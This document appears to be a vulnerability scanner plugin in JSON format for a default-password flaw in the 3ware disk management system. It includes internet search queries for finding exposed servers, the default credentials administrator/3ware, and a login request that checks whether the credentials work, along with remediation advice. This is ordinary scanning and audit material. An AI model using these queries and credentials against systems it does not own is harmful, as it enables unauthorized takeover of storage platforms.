{ "Name": "3ware default password vulnerability", "Description": "

3ware is a disk management system. It ships with a default password; an attacker who logs in with the default credentials administrator/3ware can take control of the entire platform and use administrator privileges to operate its core functions.

", "Product": "3ware", "Homepage": "http://www.3ware.tw/", "DisclosureDate": "2022-03-31", "Author": "13eczou", "FofaQuery": "banner=\"Server: 3ware/2.0\" || header=\"Server: 3ware/2.0\"", "GobyQuery": "banner=\"Server: 3ware/2.0\" || header=\"Server: 3ware/2.0\"", "Level": "1", "Impact": "

An attacker who logs in with the default credentials administrator/3ware can take control of the entire platform and use administrator privileges to operate its core functions.

", "Recommendation": "

1. Change the default password. The new password should contain uppercase and lowercase letters, numbers and special characters, and be longer than 8 characters.

2. Unless it is necessary, do not expose the system to the public network.

3. Restrict access with access policies and whitelists on security devices such as firewalls.

", "References": [ "https://fofa.info/" ], "Is0day": false, "HasExp": true, "ExpParams": [], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "POST", "uri": "/login.html", "follow_redirect": false, "header": { "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "whopwd=a&thepwd=3ware" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$head", "operation": "contains", "value": "TDMUSER", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "logged", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "POST", "uri": "/login.html", "follow_redirect": false, "header": { "Content-Type": "application/x-www-form-urlencoded" }, "data_type": "text", "data": "whopwd=a&thepwd=3ware" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$head", "operation": "contains", "value": "TDMUSER", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "logged", "bz": "" } ] }, "SetVariable": [ "output|lastbody|text|(administrator/3ware)" ] } ], "Tags": [ "default Password" ], "VulType": [ "default Password" ], "CVEIDs": [ "" ], "CNNVD": [ "" ], "CNVD": [ "" ], "CVSSScore": "5.0", "Translation": { "CN": { "Name": "3ware 默认口令漏洞", "Product": "3ware", "Description": "

3ware  是一款磁盘管理系统。该系统存在默认口令,攻击者可通过默认口令administrator/3ware漏洞控制整个平台,使用管理员权限操作核心的功能。

", "Recommendation": "

1、修改默认口令,密码最好包含大小写字母、数字和特殊字符等,且位数大于8位。

2、如非必要,禁止公网访问该系统。

3、通过防火墙等安全设备设置访问策略,设置白名单访问。

", "Impact": "

攻击者可通过默认口令administrator/3ware漏洞控制整个平台,使用管理员权限操作核心的功能。

", "VulType": [ "默认口令" ], "Tags": [ "默认口令" ] }, "EN": { "Name": "3ware default password vulnerability", "Product": "3ware", "Description": "

3ware is a disk management system. It ships with a default password; an attacker who logs in with the default credentials administrator/3ware can take control of the entire platform and use administrator privileges to operate its core functions.

", "Recommendation": "

1. Change the default password. The new password should contain uppercase and lowercase letters, numbers and special characters, and be longer than 8 characters.

2. Unless it is necessary, do not expose the system to the public network.

3. Restrict access with access policies and whitelists on security devices such as firewalls.

", "Impact": "

An attacker who logs in with the default credentials administrator/3ware can take control of the entire platform and use administrator privileges to operate its core functions.

", "VulType": [ "default Password" ], "Tags": [ "default Password" ] } }, "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }